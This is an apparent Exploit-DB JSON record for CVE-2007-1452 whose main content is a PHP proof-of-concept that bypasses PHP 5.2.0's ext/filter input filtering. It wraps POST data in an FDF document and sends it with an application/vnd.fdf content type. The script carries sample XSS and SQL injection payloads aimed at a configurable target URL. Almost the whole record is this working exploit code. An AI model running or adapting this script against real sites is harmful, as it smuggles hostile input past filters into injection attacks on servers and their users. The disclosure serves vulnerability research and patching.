{"id": "EDB-ID:3452", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "PHP 5.2.0 - EXT/Filter FDF Post Filter Bypass", "description": "", "published": "2007-03-10T00:00:00", "modified": "2007-03-10T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/3452", "reporter": "Stefan Esser", "references": [], "cvelist": ["2007-1452"], "immutableFields": [], "lastseen": "2022-08-16T09:37:23", "viewCount": 32, "enchantments": {"dependencies": {}, "score": {"value": 0.1, "vector": "NONE"}, "backreferences": {}, "exploitation": null, "vulnersScore": 0.1}, "_state": {"dependencies": 1661182887, "score": 1661176728, "epss": 1678791570}, "_internal": {"score_hash": "0795e1664b85ce5d4569dc164c72f3a7"}, "sourceHref": "https://www.exploit-db.com/download/3452", "sourceData": "<?php\r\n ////////////////////////////////////////////////////////////////////////\r\n // _ _ _ _ ___ _ _ ___ //\r\n // | || | __ _ _ _ __| | ___ _ _ ___ __| | ___ | _ \\| || || _ \\ //\r\n // | __ |/ _` || '_|/ _` |/ -_)| ' \\ / -_)/ _` ||___|| _/| __ || _/ //\r\n // |_||_|\\__,_||_| \\__,_|\\___||_||_|\\___|\\__,_| |_| |_||_||_| //\r\n // //\r\n // Proof of concept code from the Hardened-PHP Project //\r\n // (C) Copyright 2007 Stefan Esser //\r\n // //\r\n ////////////////////////////////////////////////////////////////////////\r\n // PHP ext/filter FDF POST Filter Bypass Exploit //\r\n ////////////////////////////////////////////////////////////////////////\r\n\r\n // This is meant as a protection against remote file inclusion.\r\n die(\"REMOVE THIS LINE\");\r\n\r\n // _POST is the array that will be sent to the url in $url\r\n $_POST = array();\r\n $_POST['var1'] = \"<script>alert(/XSS/);</script>\";\r\n $_POST['var2'] = \" ' UNION SELECT \";\r\n\r\n $url = \"http://127.0.0.1/info.php\"; \r\n \r\n // You do not need to change anything below this\r\n \r\n $outfdf = fdf_create();\r\n foreach ($_POST as $key 
=> $value) {\r\n fdf_set_value($outfdf, $key, $value, 0);\r\n }\r\n fdf_save($outfdf, \"outtest.fdf\");\r\n fdf_close($outfdf);\r\n \r\n $ret = file_get_contents(\"outtest.fdf\");\r\n unlink(\"outtest.fdf\");\r\n \r\n $params = array('http' => array(\r\n 'method' => 'POST',\r\n 'content' => $ret,\r\n 'header' => 'Content-Type: application/vnd.fdf'\r\n ));\r\n \r\n $ctx = stream_context_create($params);\r\n $fp = @fopen($url, 'rb', false, $ctx);\r\n if (!$fp) {\r\n die(\"Cannot open $url\");\r\n }\r\n $response = @stream_get_contents($fp); \r\n\r\n echo $response;\r\n echo \"\\n\";\r\n?> \r\n\r\n# milw0rm.com [2007-03-10]", "osvdbidlist": ["33931"], "exploitType": "remote", "verified": true}
{}